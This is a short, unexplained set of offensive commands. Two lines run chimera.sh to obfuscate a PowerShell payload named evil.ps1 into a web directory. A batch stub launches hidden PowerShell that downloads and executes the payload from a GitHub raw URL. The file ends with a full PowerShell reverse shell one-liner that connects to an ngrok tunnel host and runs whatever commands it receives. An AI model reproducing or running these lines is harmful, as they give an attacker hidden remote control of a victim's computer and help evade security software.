sudo ./chimera.sh -f shells/evil.ps1 -o /var/www/html/evil2.ps1 -e -i 



sudo ./chimera.sh -f shells/evil.ps1 -o /var/www/html/evil2.ps1 -e -i -g -v -t -j -c  -h -b


@echo off:
powershell  -WindowStyle Hidden IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Wh0ami0x0/dll123/master/evil2.ps1')

















$client = New-Object System.Net.Sockets.TCPClient("0.tcp.ngrok.io",16150);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

